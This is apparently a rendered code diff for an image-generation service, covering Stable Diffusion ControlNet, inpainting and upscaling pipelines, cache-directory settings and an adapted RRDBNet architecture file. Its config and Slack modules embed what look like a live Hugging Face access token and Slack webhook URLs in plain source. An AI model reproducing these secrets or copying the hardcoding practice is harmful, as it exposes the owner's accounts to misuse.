-            "lllyasviel/control_v11f1e_sd15_tile", torch_dtype=torch.float16
         ).to("cuda")
         self.__current_task_name = "tile_upscaler"
         self.controlnet = tile_upscaler
@@ -110,7 +113,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "scribble":
             return
         scribble = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_scribble", torch_dtype=torch.float16
         ).to("cuda")
         self.__current_task_name = "scribble"
         self.controlnet = scribble
@@ -129,6 +134,7 @@ class ControlNet(AbstractPipeline):
         linearart = ControlNetModel.from_pretrained(
             "ControlNet-1-1-preview/control_v11p_sd15_lineart",
             torch_dtype=torch.float16,
         ).to("cuda")
         self.__current_task_name = "linearart"
         self.controlnet = linearart
@@ -142,9 +148,12 @@ class ControlNet(AbstractPipeline):
         clear_cuda_and_gc()
     def cleanup(self):
-        self.pipe.controlnet = None
-        self.pipe2.controlnet = None
         self.controlnet = None
         self.__current_task_name = ""
         clear_cuda_and_gc()
@@ -343,7 +352,7 @@ class ControlNet(AbstractPipeline):
     def __resize_for_condition_image(self, image: Image.Image, resolution: int):
         input_image = image.convert("RGB")
         W, H = input_image.size
-        k = float(resolution) / min(W, H)
         H *= k
         W *= k
         H = int(round(H / 64.0)) * 64

 import numpy as np
 import torch
 from controlnet_aux import HEDdetector, LineartDetector, OpenposeDetector
+from diffusers import (ControlNetModel, DiffusionPipeline,
+                       StableDiffusionControlNetPipeline,
+                       UniPCMultistepScheduler)
 from PIL import Image
 from torch.nn import Linear
 from tqdm import gui
 from internals.data.result import Result
 from internals.pipelines.commons import AbstractPipeline
+from internals.pipelines.tileUpscalePipeline import \
+    StableDiffusionControlNetImg2ImgPipeline
 from internals.util.cache import clear_cuda_and_gc
 from internals.util.commons import download_image
+from internals.util.config import get_hf_cache_dir, get_hf_token, get_model_dir
 class ControlNet(AbstractPipeline):
             controlnet=self.controlnet,
             torch_dtype=torch.float16,
             use_auth_token=get_hf_token(),
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         # pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.enable_model_cpu_offload()
         if self.__current_task_name == "canny":
             return
         canny = ControlNetModel.from_pretrained(
+            "lllyasviel/control_v11p_sd15_canny",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "canny"
         self.controlnet = canny
         if self.__current_task_name == "pose":
             return
         pose = ControlNetModel.from_pretrained(
+            "lllyasviel/sd-controlnet-openpose",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "pose"
         self.controlnet = pose
         if self.__current_task_name == "tile_upscaler":
             return
         tile_upscaler = ControlNetModel.from_pretrained(
+            "lllyasviel/control_v11f1e_sd15_tile",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "tile_upscaler"
         self.controlnet = tile_upscaler
         if self.__current_task_name == "scribble":
             return
         scribble = ControlNetModel.from_pretrained(
+            "lllyasviel/control_v11p_sd15_scribble",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "scribble"
         self.controlnet = scribble
         linearart = ControlNetModel.from_pretrained(
             "ControlNet-1-1-preview/control_v11p_sd15_lineart",
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__current_task_name = "linearart"
         self.controlnet = linearart
         clear_cuda_and_gc()
     def cleanup(self):
+        if hasattr(self, "pipe"):
+            self.pipe.controlnet = None
+        if hasattr(self, "pipe2"):
+            self.pipe2.controlnet = None
         self.controlnet = None
+        del self.controlnet
         self.__current_task_name = ""
         clear_cuda_and_gc()
     def __resize_for_condition_image(self, image: Image.Image, resolution: int):
         input_image = image.convert("RGB")
         W, H = input_image.size
+        k = float(resolution) / max(W, H)
         H *= k
         W *= k
         H = int(round(H / 64.0)) * 64

internals/pipelines/high_res.py ADDED Viewed

	@@ -0,0 +1,55 @@

+import math
+from typing import List, Optional
+from PIL import Image
+from internals.data.result import Result
+from internals.pipelines.commons import AbstractPipeline, Img2Img
+from internals.util.config import get_model_dir
+class HighRes(AbstractPipeline):
+    def load(self, img2img: Optional[Img2Img] = None):
+        if hasattr(self, "pipe"):
+            return
+        if not img2img:
+            img2img = Img2Img()
+            img2img.load(get_model_dir())
+        self.pipe = img2img.pipe
+        self.img2img = img2img
+    def apply(
+        self,
+        prompt: List[str],
+        negative_prompt: List[str],
+        images,
+        width: int,
+        height: int,
+        steps: int,
+    ):
+        images = [image.resize((width, height)) for image in images]
+        result = self.pipe.__call__(
+            prompt=prompt,
+            image=images,
+            strength=0.5,
+            negative_prompt=negative_prompt,
+            guidance_scale=9,
+            num_inference_steps=steps,
+        )
+        return Result.from_result(result)
+    @staticmethod
+    def get_intermediate_dimension(target_width: int, target_height: int):
+        def_size = 512
+        desired_pixel_count = def_size * def_size
+        actual_pixel_count = target_width * target_height
+        scale = math.sqrt(desired_pixel_count / actual_pixel_count)
+        firstpass_width = math.ceil(scale * target_width / 64) * 64
+        firstpass_height = math.ceil(scale * target_height / 64) * 64
+        return firstpass_width, firstpass_height

internals/pipelines/img_to_text.py CHANGED Viewed

@@ -5,6 +5,7 @@ from torchvision import transforms
 from transformers import BlipForConditionalGeneration, BlipProcessor
 from internals.util.commons import download_image
 class Image2Text:
@@ -15,10 +16,13 @@ class Image2Text:
             return
         self.processor = BlipProcessor.from_pretrained(
-            "Salesforce/blip-image-captioning-large"
         )
         self.model = BlipForConditionalGeneration.from_pretrained(
-            "Salesforce/blip-image-captioning-large", torch_dtype=torch.float16
         ).to("cuda")
         self.__loaded = True

 from transformers import BlipForConditionalGeneration, BlipProcessor
 from internals.util.commons import download_image
+from internals.util.config import get_hf_cache_dir
 class Image2Text:
             return
         self.processor = BlipProcessor.from_pretrained(
+            "Salesforce/blip-image-captioning-large",
+            cache_dir=get_hf_cache_dir(),
         )
         self.model = BlipForConditionalGeneration.from_pretrained(
+            "Salesforce/blip-image-captioning-large",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         self.__loaded = True

internals/pipelines/inpainter.py CHANGED Viewed

@@ -5,6 +5,7 @@ from diffusers import StableDiffusionInpaintPipeline
 from internals.pipelines.commons import AbstractPipeline
 from internals.util.commons import disable_safety_checker, download_image
 class InPainter(AbstractPipeline):
@@ -12,6 +13,7 @@ class InPainter(AbstractPipeline):
         self.pipe = StableDiffusionInpaintPipeline.from_pretrained(
             "jayparmr/icbinp_v8_inpaint_v2",
             torch_dtype=torch.float16,
         ).to("cuda")
         disable_safety_checker(self.pipe)
@@ -31,6 +33,7 @@ class InPainter(AbstractPipeline):
         seed: int,
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
     ):
         torch.manual_seed(seed)
@@ -44,4 +47,5 @@ class InPainter(AbstractPipeline):
             height=height,
             width=width,
             negative_prompt=negative_prompt,
         ).images

 from internals.pipelines.commons import AbstractPipeline
 from internals.util.commons import disable_safety_checker, download_image
+from internals.util.config import get_hf_cache_dir
 class InPainter(AbstractPipeline):
         self.pipe = StableDiffusionInpaintPipeline.from_pretrained(
             "jayparmr/icbinp_v8_inpaint_v2",
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         disable_safety_checker(self.pipe)
         seed: int,
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
+        steps: int = 50,
     ):
         torch.manual_seed(seed)
             height=height,
             width=width,
             negative_prompt=negative_prompt,
+            num_inference_steps=steps,
         ).images

internals/pipelines/replace_background.py CHANGED Viewed

@@ -17,17 +17,21 @@ from internals.pipelines.controlnets import ControlNet
 from internals.pipelines.remove_background import RemoveBackgroundV2
 from internals.pipelines.upscaler import Upscaler
 from internals.util.commons import download_image
 class ReplaceBackground(AbstractPipeline):
     def load(self, upscaler: Upscaler, remove_background: RemoveBackgroundV2):
         controlnet = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_lineart", torch_dtype=torch.float16
         ).to("cuda")
         pipe = StableDiffusionControlNetInpaintPipeline.from_pretrained(
             "runwayml/stable-diffusion-inpainting",
             controlnet=controlnet,
             torch_dtype=torch.float16,
         )
         pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.to("cuda")
@@ -47,6 +51,7 @@ class ReplaceBackground(AbstractPipeline):
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
         resize_dimension: int,
         seed: int,
         steps: int,
     ):
@@ -57,6 +62,8 @@ class ReplaceBackground(AbstractPipeline):
         torch.cuda.manual_seed(seed)
         image = image.convert("RGB")
         image = self.remove_background.remove(image)
         width = int(width)
@@ -95,6 +102,7 @@ class ReplaceBackground(AbstractPipeline):
             image=image,
             mask_image=mask,
             control_image=condition_image,
             guidance_scale=9,
             strength=1,
             height=height,

 from internals.pipelines.remove_background import RemoveBackgroundV2
 from internals.pipelines.upscaler import Upscaler
 from internals.util.commons import download_image
+from internals.util.config import get_hf_cache_dir
 class ReplaceBackground(AbstractPipeline):
     def load(self, upscaler: Upscaler, remove_background: RemoveBackgroundV2):
         controlnet = ControlNetModel.from_pretrained(
+            "lllyasviel/control_v11p_sd15_lineart",
+            torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         ).to("cuda")
         pipe = StableDiffusionControlNetInpaintPipeline.from_pretrained(
             "runwayml/stable-diffusion-inpainting",
             controlnet=controlnet,
             torch_dtype=torch.float16,
+            cache_dir=get_hf_cache_dir(),
         )
         pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.to("cuda")
         prompt: Union[str, List[str]],
         negative_prompt: Union[str, List[str]],
         resize_dimension: int,
+        conditioning_scale: float,
         seed: int,
         steps: int,
     ):
         torch.cuda.manual_seed(seed)
         image = image.convert("RGB")
+        if max(image.size) > 1536:
+            image = ImageUtil.resize_image(image, dimension=1536)
         image = self.remove_background.remove(image)
         width = int(width)
             image=image,
             mask_image=mask,
             control_image=condition_image,
+            controlnet_conditioning_scale=conditioning_scale,
             guidance_scale=9,
             strength=1,
             height=height,

internals/pipelines/upscaler.py CHANGED Viewed

@@ -15,6 +15,7 @@ from realesrgan import RealESRGANer
 import internals.util.image as ImageUtil
 from internals.util.commons import download_image
 from internals.util.config import get_root_dir
 class Upscaler:
@@ -23,6 +24,9 @@ class Upscaler:
     __model_gfpgan_url = (
         "https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth"
     )
     __loaded = False
@@ -40,6 +44,9 @@ class Upscaler:
         self.__model_path_gfpgan = self.__preload_model(
             self.__model_gfpgan_url, download_dir
         )
         self.__loaded = True
     def upscale(
@@ -129,16 +136,21 @@ class Upscaler:
         scale = max(math.floor(resize_dimension / dimension), 2)
         os.chdir(str(Path.home() / ".cache"))
-        upsampler = RealESRGANer(
-            scale=4,
-            model_path=model_path,
-            model=model,
-            half=False,
-            gpu_id="0",
-            tile=0,
-            tile_pad=10,
-            pre_pad=0,
-        )
         face_enhancer = GFPGANer(
             model_path=self.__model_path_gfpgan,
             upscale=scale,

 import internals.util.image as ImageUtil
 from internals.util.commons import download_image
 from internals.util.config import get_root_dir
+from models.ultrasharp.model import Ultrasharp
 class Upscaler:
     __model_gfpgan_url = (
         "https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth"
     )
+    __model_4x_ultrasharp_url = (
+        "https://comic-assets.s3.ap-south-1.amazonaws.com/models/4x-UltraSharp.pth"
+    )
     __loaded = False
         self.__model_path_gfpgan = self.__preload_model(
             self.__model_gfpgan_url, download_dir
         )
+        self.__model_path_4x_ultrasharp = self.__preload_model(
+            self.__model_4x_ultrasharp_url, download_dir
+        )
         self.__loaded = True
     def upscale(
         scale = max(math.floor(resize_dimension / dimension), 2)
         os.chdir(str(Path.home() / ".cache"))
+        if scale == 4:
+            print("Using 4x-Ultrasharp")
+            upsampler = Ultrasharp(self.__model_path_4x_ultrasharp)
+        else:
+            print("Using RealESRGANer")
+            upsampler = RealESRGANer(
+                scale=4,
+                model_path=model_path,
+                model=model,
+                half=False,
+                gpu_id="0",
+                tile=0,
+                tile_pad=10,
+                pre_pad=0,
+            )
         face_enhancer = GFPGANer(
             model_path=self.__model_path_gfpgan,
             upscale=scale,

internals/util/avatar.py CHANGED Viewed

@@ -15,6 +15,8 @@ class Avatar:
             print("Local characters", self.__avatars)
     def fetch_from_network(self, model_id: int):
         characters = getCharacters(str(model_id))
         if characters is not None:
             for character in characters:

             print("Local characters", self.__avatars)
     def fetch_from_network(self, model_id: int):
+        if not model_id:
+            return
         characters = getCharacters(str(model_id))
         if characters is not None:
             for character in characters:

internals/util/config.py CHANGED Viewed

@@ -1,17 +1,32 @@
 import os
 from internals.data.task import Task
-env = "gamma"
 nsfw_threshold = 0.0
 nsfw_access = False
 access_token = ""
 root_dir = ""
 model_dir = ""
 hf_token = "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"
 num_return_sequences = 4  # the number of results to generate
 def set_model_dir(dir: str):
     global model_dir
@@ -26,10 +41,10 @@ def set_root_dir(main_file: str):
 def set_configs_from_task(task: Task):
     global env, nsfw_threshold, nsfw_access, access_token
     name = task.get_queue_name()
-    if name.startswith("prod"):
-        env = "prod"
-    else:
         env = "gamma"
     nsfw_threshold = task.get_nsfw_threshold()
     nsfw_access = task.can_access_nsfw()
     access_token = task.get_access_token()

 import os
+from pathlib import Path
+from typing import Union
 from internals.data.task import Task
+env = "prod"
 nsfw_threshold = 0.0
 nsfw_access = False
 access_token = ""
 root_dir = ""
 model_dir = ""
 hf_token = "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"
+hf_cache_dir = "/tmp/hf_hub"
 num_return_sequences = 4  # the number of results to generate
+os.makedirs(hf_cache_dir, exist_ok=True)
+def set_hf_cache_dir(dir: Union[str, Path]):
+    global hf_cache_dir
+    hf_cache_dir = str(dir)
+def get_hf_cache_dir():
+    global hf_cache_dir
+    return hf_cache_dir
 def set_model_dir(dir: str):
     global model_dir
 def set_configs_from_task(task: Task):
     global env, nsfw_threshold, nsfw_access, access_token
     name = task.get_queue_name()
+    if name.startswith("gamma"):
         env = "gamma"
+    else:
+        env = "prod"
     nsfw_threshold = task.get_nsfw_threshold()
     nsfw_access = task.can_access_nsfw()
     access_token = task.get_access_token()

internals/util/prompt.py ADDED Viewed

	@@ -0,0 +1,132 @@

+from typing import List, Optional
+from internals.data.task import Task
+from internals.pipelines.commons import Text2Img
+from internals.pipelines.img_classifier import ImageClassifier
+from internals.pipelines.img_to_text import Image2Text
+from internals.pipelines.prompt_modifier import PromptModifier
+from internals.util.anomaly import remove_colors
+from internals.util.avatar import Avatar
+from internals.util.config import num_return_sequences
+from internals.util.lora_style import LoraStyle
+def get_patched_prompt(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    prompt_modifier: PromptModifier,
+):
+    def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
+        for i in range(len(prompt)):
+            prompt[i] = avatar.add_code_names(prompt[i])
+            prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
+            if additional:
+                prompt[i] = additional + " " + prompt[i]
+    prompt = task.get_prompt()
+    if task.is_prompt_engineering():
+        prompt = prompt_modifier.modify(prompt)
+    else:
+        prompt = [prompt] * num_return_sequences
+    ori_prompt = [task.get_prompt()] * num_return_sequences
+    class_name = None
+    add_style_and_character(ori_prompt, class_name)
+    add_style_and_character(prompt, class_name)
+    print({"prompts": prompt})
+    return (prompt, ori_prompt)
+def get_patched_prompt_text2img(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    prompt_modifier: PromptModifier,
+) -> Text2Img.Params:
+    def add_style_and_character(prompt: str, prepend: str = ""):
+        prompt = avatar.add_code_names(prompt)
+        prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
+        prompt = prepend + prompt
+        return prompt
+    if task.get_prompt_left() and task.get_prompt_right():
+        # prepend = "2characters, "
+        prepend = ""
+        if task.is_prompt_engineering():
+            mod_prompt = prompt_modifier.modify(task.get_prompt())
+        else:
+            mod_prompt = [task.get_prompt()] * num_return_sequences
+        prompt, prompt_left, prompt_right = [], [], []
+        for i in range(len(mod_prompt)):
+            mp = mod_prompt[i].replace(task.get_prompt(), "")
+            prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
+            prompt_left.append(
+                add_style_and_character(task.get_prompt_left(), prepend) + mp
+            )
+            prompt_right.append(
+                add_style_and_character(task.get_prompt_right(), prepend) + mp
+            )
+        params = Text2Img.Params(
+            prompt=prompt,
+            prompt_left=prompt_left,
+            prompt_right=prompt_right,
+        )
+    else:
+        if task.is_prompt_engineering():
+            mod_prompt = prompt_modifier.modify(task.get_prompt())
+        else:
+            mod_prompt = [task.get_prompt()] * num_return_sequences
+        mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
+        params = Text2Img.Params(
+            prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
+            modified_prompt=mod_prompt,
+        )
+    print(params)
+    return params
+def get_patched_prompt_tile_upscale(
+    task: Task,
+    avatar: Avatar,
+    lora_style: LoraStyle,
+    img_classifier: ImageClassifier,
+    img2text: Image2Text,
+):
+    if task.get_prompt():
+        prompt = task.get_prompt()
+    else:
+        prompt = img2text.process(task.get_imageUrl())
+    # merge blip
+    if task.PROMPT.has_placeholder_blip_merge():
+        blip = img2text.process(task.get_imageUrl())
+        prompt = task.PROMPT.merge_blip(blip)
+    # remove anomalies in prompt
+    prompt = remove_colors(prompt)
+    prompt = avatar.add_code_names(prompt)
+    prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
+    if not task.get_style():
+        class_name = img_classifier.classify(
+            task.get_imageUrl(), task.get_width(), task.get_height()
+        )
+    else:
+        class_name = ""
+    prompt = class_name + " " + prompt
+    prompt = prompt.strip()
+    print({"prompt": prompt})
+    return prompt

internals/util/slack.py CHANGED Viewed

@@ -11,7 +11,7 @@ class Slack:
     def __init__(self):
         # self.webhook_url = "https://hooks.slack.com/services/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"
         self.webhook_url = "https://hooks.slack.com/services/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"
-        self.error_webhook = "https://hooks.slack.com/services/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"
     def send_alert(self, task: Task, args: Optional[dict]):
         raw = task.get_raw().copy()

     def __init__(self):
         # self.webhook_url = "https://hooks.slack.com/services/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"
         self.webhook_url = "https://hooks.slack.com/services/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"
+        self.error_webhook = "https://hooks.slack.com/services/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"
     def send_alert(self, task: Task, args: Optional[dict]):
         raw = task.get_raw().copy()

models/ultrasharp/arch.py ADDED Viewed

	@@ -0,0 +1,756 @@

+# this file is adapted from https://github.com/victorca25/iNNfer
+import math
+from collections import OrderedDict
+import torch
+import torch.nn as nn
+import torch.nn.functional as F
+####################
+# RRDBNet Generator
+####################
+class RRDBNet(nn.Module):
+    def __init__(
+        self,
+        in_nc,
+        out_nc,
+        nf,
+        nb,
+        nr=3,
+        gc=32,
+        upscale=4,
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        upsample_mode="upconv",
+        convtype="Conv2D",
+        finalact=None,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(RRDBNet, self).__init__()
+        n_upscale = int(math.log(upscale, 2))
+        if upscale == 3:
+            n_upscale = 1
+        self.resrgan_scale = 0
+        if in_nc % 16 == 0:
+            self.resrgan_scale = 1
+        elif in_nc != 4 and in_nc % 4 == 0:
+            self.resrgan_scale = 2
+        fea_conv = conv_block(
+            in_nc, nf, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
+        )
+        rb_blocks = [
+            RRDB(
+                nf,
+                nr,
+                kernel_size=3,
+                gc=32,
+                stride=1,
+                bias=1,
+                pad_type="zero",
+                norm_type=norm_type,
+                act_type=act_type,
+                mode="CNA",
+                convtype=convtype,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            for _ in range(nb)
+        ]
+        LR_conv = conv_block(
+            nf,
+            nf,
+            kernel_size=3,
+            norm_type=norm_type,
+            act_type=None,
+            mode=mode,
+            convtype=convtype,
+        )
+        if upsample_mode == "upconv":
+            upsample_block = upconv_block
+        elif upsample_mode == "pixelshuffle":
+            upsample_block = pixelshuffle_block
+        else:
+            raise NotImplementedError(f"upsample mode [{upsample_mode}] is not found")
+        if upscale == 3:
+            upsampler = upsample_block(nf, nf, 3, act_type=act_type, convtype=convtype)
+        else:
+            upsampler = [
+                upsample_block(nf, nf, act_type=act_type, convtype=convtype)
+                for _ in range(n_upscale)
+            ]
+        HR_conv0 = conv_block(
+            nf, nf, kernel_size=3, norm_type=None, act_type=act_type, convtype=convtype
+        )
+        HR_conv1 = conv_block(
+            nf, out_nc, kernel_size=3, norm_type=None, act_type=None, convtype=convtype
+        )
+        outact = act(finalact) if finalact else None
+        self.model = sequential(
+            fea_conv,
+            ShortcutBlock(sequential(*rb_blocks, LR_conv)),
+            *upsampler,
+            HR_conv0,
+            HR_conv1,
+            outact,
+        )
+    def forward(self, x, outm=None):
+        if self.resrgan_scale == 1:
+            feat = pixel_unshuffle(x, scale=4)
+        elif self.resrgan_scale == 2:
+            feat = pixel_unshuffle(x, scale=2)
+        else:
+            feat = x
+        return self.model(feat)
+class RRDB(nn.Module):
+    """
+    Residual in Residual Dense Block
+    (ESRGAN: Enhanced Super-Resolution Generative Adversarial Networks)
+    """
+    def __init__(
+        self,
+        nf,
+        nr=3,
+        kernel_size=3,
+        gc=32,
+        stride=1,
+        bias=1,
+        pad_type="zero",
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        convtype="Conv2D",
+        spectral_norm=False,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(RRDB, self).__init__()
+        # This is for backwards compatibility with existing models
+        if nr == 3:
+            self.RDB1 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            self.RDB2 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+            self.RDB3 = ResidualDenseBlock_5C(
+                nf,
+                kernel_size,
+                gc,
+                stride,
+                bias,
+                pad_type,
+                norm_type,
+                act_type,
+                mode,
+                convtype,
+                spectral_norm=spectral_norm,
+                gaussian_noise=gaussian_noise,
+                plus=plus,
+            )
+        else:
+            RDB_list = [
+                ResidualDenseBlock_5C(
+                    nf,
+                    kernel_size,
+                    gc,
+                    stride,
+                    bias,
+                    pad_type,
+                    norm_type,
+                    act_type,
+                    mode,
+                    convtype,
+                    spectral_norm=spectral_norm,
+                    gaussian_noise=gaussian_noise,
+                    plus=plus,
+                )
+                for _ in range(nr)
+            ]
+            self.RDBs = nn.Sequential(*RDB_list)
+    def forward(self, x):
+        if hasattr(self, "RDB1"):
+            out = self.RDB1(x)
+            out = self.RDB2(out)
+            out = self.RDB3(out)
+        else:
+            out = self.RDBs(x)
+        return out * 0.2 + x
+class ResidualDenseBlock_5C(nn.Module):
+    """
+    Residual Dense Block
+    The core module of paper: (Residual Dense Network for Image Super-Resolution, CVPR 18)
+    Modified options that can be used:
+        - "Partial Convolution based Padding" arXiv:1811.11718
+        - "Spectral normalization" arXiv:1802.05957
+        - "ICASSP 2020 - ESRGAN+ : Further Improving ESRGAN" N. C.
+            {Rakotonirina} and A. {Rasoanaivo}
+    """
+    def __init__(
+        self,
+        nf=64,
+        kernel_size=3,
+        gc=32,
+        stride=1,
+        bias=1,
+        pad_type="zero",
+        norm_type=None,
+        act_type="leakyrelu",
+        mode="CNA",
+        convtype="Conv2D",
+        spectral_norm=False,
+        gaussian_noise=False,
+        plus=False,
+    ):
+        super(ResidualDenseBlock_5C, self).__init__()
+        self.noise = GaussianNoise() if gaussian_noise else None
+        self.conv1x1 = conv1x1(nf, gc) if plus else None
+        self.conv1 = conv_block(
+            nf,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv2 = conv_block(
+            nf + gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv3 = conv_block(
+            nf + 2 * gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        self.conv4 = conv_block(
+            nf + 3 * gc,
+            gc,
+            kernel_size,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=act_type,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+        if mode == "CNA":
+            last_act = None
+        else:
+            last_act = act_type
+        self.conv5 = conv_block(
+            nf + 4 * gc,
+            nf,
+            3,
+            stride,
+            bias=bias,
+            pad_type=pad_type,
+            norm_type=norm_type,
+            act_type=last_act,
+            mode=mode,
+            convtype=convtype,
+            spectral_norm=spectral_norm,
+        )
+    def forward(self, x):
+        x1 = self.conv1(x)
+        x2 = self.conv2(torch.cat((x, x1), 1))
+        if self.conv1x1:
+            x2 = x2 + self.conv1x1(x)
+        x3 = self.conv3(torch.cat((x, x1, x2), 1))
+        x4 = self.conv4(torch.cat((x, x1, x2, x3), 1))
+        if self.conv1x1:
+            x4 = x4 + x2
+        x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
+        if self.noise:
+            return self.noise(x5.mul(0.2) + x)
+        else:
+            return x5 * 0.2 + x
+####################
+# ESRGANplus
+####################
+class GaussianNoise(nn.Module):
+    def __init__(self, sigma=0.1, is_relative_detach=False):
+        super().__init__()
+        self.sigma = sigma
+        self.is_relative_detach = is_relative_detach
+        self.noise = torch.tensor(0, dtype=torch.float)
+    def forward(self, x):
+        if self.training and self.sigma != 0:
+            self.noise = self.noise.to(x.device)
+            scale = (
+                self.sigma * x.detach() if self.is_relative_detach else self.sigma * x
+            )
+            sampled_noise = self.noise.repeat(*x.size()).normal_() * scale
+            x = x + sampled_noise
+        return x
+def conv1x1(in_planes, out_planes, stride=1):
+    return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
+####################
+# SRVGGNetCompact
+####################
+class SRVGGNetCompact(nn.Module):
+    """A compact VGG-style network structure for super-resolution.
+    This class is copied from https://github.com/xinntao/Real-ESRGAN
+    """
+    def __init__(
+        self,
+        num_in_ch=3,
+        num_out_ch=3,
+        num_feat=64,
+        num_conv=16,
+        upscale=4,
+        act_type="prelu",
+    ):
+        super(SRVGGNetCompact, self).__init__()
+        self.num_in_ch = num_in_ch
+        self.num_out_ch = num_out_ch
+        self.num_feat = num_feat
+        self.num_conv = num_conv
+        self.upscale = upscale
+        self.act_type = act_type
+        self.body = nn.ModuleList()
+        # the first conv
+        self.body.append(nn.Conv2d(num_in_ch, num_feat, 3, 1, 1))
+        # the first activation
+        if act_type == "relu":
+            activation = nn.ReLU(inplace=True)
+        elif act_type == "prelu":
+            activation = nn.PReLU(num_parameters=num_feat)
+        elif act_type == "leakyrelu":
+            activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
+        self.body.append(activation)
+        # the body structure
+        for _ in range(num_conv):
+            self.body.append(nn.Conv2d(num_feat, num_feat, 3, 1, 1))
+            # activation
+            if act_type == "relu":
+                activation = nn.ReLU(inplace=True)
+            elif act_type == "prelu":
+                activation = nn.PReLU(num_parameters=num_feat)
+            elif act_type == "leakyrelu":
+                activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
+            self.body.append(activation)
+        # the last conv
+        self.body.append(nn.Conv2d(num_feat, num_out_ch * upscale * upscale, 3, 1, 1))
+        # upsample
+        self.upsampler = nn.PixelShuffle(upscale)
+    def forward(self, x):
+        out = x
+        for i in range(0, len(self.body)):
+            out = self.body[i](out)
+        out = self.upsampler(out)
+        # add the nearest upsampled image, so that the network learns the residual
+        base = F.interpolate(x, scale_factor=self.upscale, mode="nearest")
+        out += base
+        return out
+####################
+# Upsampler
+####################
+class Upsample(nn.Module):
+    r"""Upsamples a given multi-channel 1D (temporal), 2D (spatial) or 3D (volumetric) data.
+    The input data is assumed to be of the form
+    `minibatch x channels x [optional depth] x [optional height] x width`.
+    """
+    def __init__(
+        self, size=None, scale_factor=None, mode="nearest", align_corners=None
+    ):
+        super(Upsample, self).__init__()
+        if isinstance(scale_factor, tuple):
+            self.scale_factor = tuple(float(factor) for factor in scale_factor)
+        else:
+            self.scale_factor = float(scale_factor) if scale_factor else None
+        self.mode = mode
+        self.size = size
+        self.align_corners = align_corners
+    def forward(self, x):
+        return nn.functional.interpolate(
+            x,
+            size=self.size,
+            scale_factor=self.scale_factor,
+            mode=self.mode,
+            align_corners=self.align_corners,
+        )
+    def extra_repr(self):
+        if self.scale_factor is not None:
+            info = f"scale_factor={self.scale_factor}"
+        else:
+            info = f"size={self.size}"
+        info += f", mode={self.mode}"
+        return info
+def pixel_unshuffle(x, scale):
+    """Pixel unshuffle.
+    Args:
+        x (Tensor): Input feature with shape (b, c, hh, hw).
+        scale (int): Downsample ratio.
+    Returns:
+        Tensor: the pixel unshuffled feature.
+    """
+    b, c, hh, hw = x.size()
+    out_channel = c * (scale**2)
+    assert hh % scale == 0 and hw % scale == 0
+    h = hh // scale
+    w = hw // scale
